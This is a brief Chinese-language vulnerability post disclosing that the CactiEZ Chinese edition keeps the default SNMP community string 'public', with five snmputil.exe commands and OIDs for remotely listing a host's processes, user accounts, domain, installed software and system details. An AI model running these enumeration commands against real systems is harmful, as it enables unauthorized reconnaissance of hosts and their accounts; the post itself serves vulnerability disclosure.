CactiEZ 中文版snmp默认团体名漏洞

南国利剑 2012-06-04 162060人围观 ,发现 4 个不明物体 漏洞

CactiEZ 中文版,是一款监控控制系统;其中默认的snmp设置public,没有修改导致可以远程读取目标设备主机信息。

如:

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.4.2.1.2   //**进程列表

snmputil.exe walk 127.0.0.1 public .1.3.6.1.4.77.1.2.25.1.1   //**用户列表

snmputil.exe get 127.0.0.1 public .1.3.6.1.4.77.1.4.1.0   //**域名

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.25.6.3.1.2   //**安装的软件

snmputil.exe walk 127.0.0.1 public .1.3.6.1.2.1.1   //**系统信息

发表评论

已有 4 条评论

取消
Loading...
css.php